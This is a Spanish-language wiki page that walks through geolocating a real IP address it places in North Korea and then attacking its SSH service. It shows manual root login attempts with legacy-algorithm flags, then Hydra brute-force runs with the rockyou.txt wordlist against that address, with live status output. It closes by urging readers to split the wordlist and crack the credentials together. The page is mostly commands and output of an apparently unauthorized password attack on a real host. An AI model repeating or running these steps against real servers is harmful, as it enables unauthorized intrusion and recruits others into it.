Se recomienda ver la wiki anterior [[norcorea:nmap|]] para entenderlo mejor

hydra@kp:~$ mmdblookup --file Descargas/maxmind/GeoLite2-City.mmdb --ip 175.45.178.129

<code json>
{
    "continent":
      {
        "code":
          "AS" <utf8_string>
        "geoname_id":
          6255147 <uint32>
        "names":
          {
            "de":
              "Asien" <utf8_string>
            "en":
              "Asia" <utf8_string>
            "es":
              "Asia" <utf8_string>
            "fr":
              "Asie" <utf8_string>
            "ja":
              "アジア" <utf8_string>
            "pt-BR":
              "Ásia" <utf8_string>
            "ru":
              "Азия" <utf8_string>
            "zh-CN":
              "亚洲" <utf8_string>
          }
      }
    "country":
      {
        "geoname_id":
          1873107 <uint32>
        "iso_code":
          "KP" <utf8_string>
        "names":
          {
            "de":
              "Nordkorea" <utf8_string>
            "en":
              "North Korea" <utf8_string>
            "es":
              "Corea del Norte" <utf8_string>
            "fr":
              "Corée du Nord" <utf8_string>
            "ja":
              "韓国、朝鮮民主主義人民共和国" <utf8_string>
            "pt-BR":
              "Coreia do Norte" <utf8_string>
            "ru":
              "КНДР" <utf8_string>
            "zh-CN":
              "朝鲜" <utf8_string>
          }
      }
    "location":
      {
        "accuracy_radius":
          50 <uint16>
        "latitude":
          40.000000 <double>
        "longitude":
          127.000000 <double>
        "time_zone":
          "Asia/Pyongyang" <utf8_string>
      }
    "registered_country":
      {
        "geoname_id":
          1873107 <uint32>
        "iso_code":
          "KP" <utf8_string>
        "names":
          {
            "de":
              "Nordkorea" <utf8_string>
            "en":
              "North Korea" <utf8_string>
            "es":
              "Corea del Norte" <utf8_string>
            "fr":
              "Corée du Nord" <utf8_string>
            "ja":
              "韓国、朝鮮民主主義人民共和国" <utf8_string>
            "pt-BR":
              "Coreia do Norte" <utf8_string>
            "ru":
              "КНДР" <utf8_string>
            "zh-CN":
              "朝鲜" <utf8_string>
          }
      }
  }
</code>

hydra@kp:~$ mmdblookup --file Descargas/maxmind/GeoLite2-City.mmdb --ip 175.45.178.129 | grep -oE '[0-9]{1,3}\.[0-9]{6}' \\
40.000000 \\
127.000000 \\

El host físico se encuentra a 2.15 km de la carretera más cercana \\

hydra@kp:~$ ssh root@175.45.178.129 \\
Unable to negotiate with 175.45.178.129 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 \\
hydra@kp:~$ \\


Para poder establecer la conexión debemos especificar el uso de un algoritmo antiguo \\

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc \\
root@175.45.178.129

(root@175.45.178.129) Password: \\
(root@175.45.178.129) Password: \\
(root@175.45.178.129) Password: \\
root@175.45.178.129's password: \\
Connection closed by 175.45.178.129 port 22 \\

Como vemos no pide clave de autenticación para que sólo pueda conectarse un cliente reconocido, por lo que cualquiera puede hacer un ataque de fuerza. Permite 4 intentos máximos y se cierra la conexión, lo típico y normal, pero como veremos más adelante ésto se lo salta hydra \\




hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc \\
corea@175.45.178.129 \\
(corea@175.45.178.129) Password: \\
(corea@175.45.178.129) Password: \\

tambien un usuario corea? \\

Damos ctrl + c \\

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc \\
kp@175.45.178.129 \\
(kp@175.45.178.129) Password: \\


kp? \\
Damos ctrl +c \\

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc \\
nhzx@175.45.178.129 \\

(nhzx@175.45.178.129) Password: \\

Podemos observar que el servidor pide contraseña aún no existiendo el nombre de usuario (como en todas las distribuciones Gnu/Linux), ésto va a dificultar el ataque de fuerza bruta porque no podemos deducir cual es. Una opción es usar rockyou.txt para el login y también para el password. pero como lo normal es tener un usuario root no nos vamos a complicar \\

En hydra no es necesario especificar ningún algoritmo para establecer la comunicación \\

Descargamos rockyou.txt con wget https://github.com/brannondorsey/naive-h...ockyou.txt \\


hydra -l root -P Descargas/rockyou.txt ssh://175.45.178.129 \\
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). \\

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 17:06:36 \\
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 \\
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore \\
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task \\
[DATA] attacking ssh://175.45.178.129:22/  \\
[STATUS] 449.00 tries/min, 449 tries in 00:01h, 14343982 to do in 532:27h, 16 active \\

[STATUS] 214.67 tries/min, 644 tries in 00:03h, 14343787 to do in 1113:39h, 16 active \\
[STATUS] 196.57 tries/min, 1376 tries in 00:07h, 14343055 to do in 1216:07h, 16 active \\
[STATUS] 204.33 tries/min, 3065 tries in 00:15h, 14341366 to do in 1169:47h, 16 active \\
[STATUS] 227.48 tries/min, 7052 tries in 00:31h, 14337379 to do in 1050:26h, 16 active \\
[STATUS] 216.09 tries/min, 10156 tries in 00:47h, 14334275 to do in 1105:37h, 16 active \\

Lo mismo pero utilizando también rockyou.txt como diccionario para login \\

hydra@kp:~$ hydra -l Descargas/rockyou.txt -P Descargas/rockyou.txt ssh://175.45.178.129 \\
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these \*\*\* ignore laws and ethics anyway). \\

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 18:54:16 \\
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 \\
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore \\
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task \\
[DATA] attacking ssh://175.45.178.129:22/ \\
[STATUS] 569.00 tries/min, 569 tries in 00:01h, 14343862 to do in 420:09h, 16 active \\
[STATUS] 394.00 tries/min, 1182 tries in 00:03h, 14343249 to do in 606:45h, 16 active \\

Como vemos funciona y se salta el límite de los 4 intentos cuando intentamos acceder de forma manual. \\

Sería más rápido, eficiente e interesante unir fuerzas dividiendo el fichero rockyou.txt en varias partes y que entre todos sacasemos el password y el user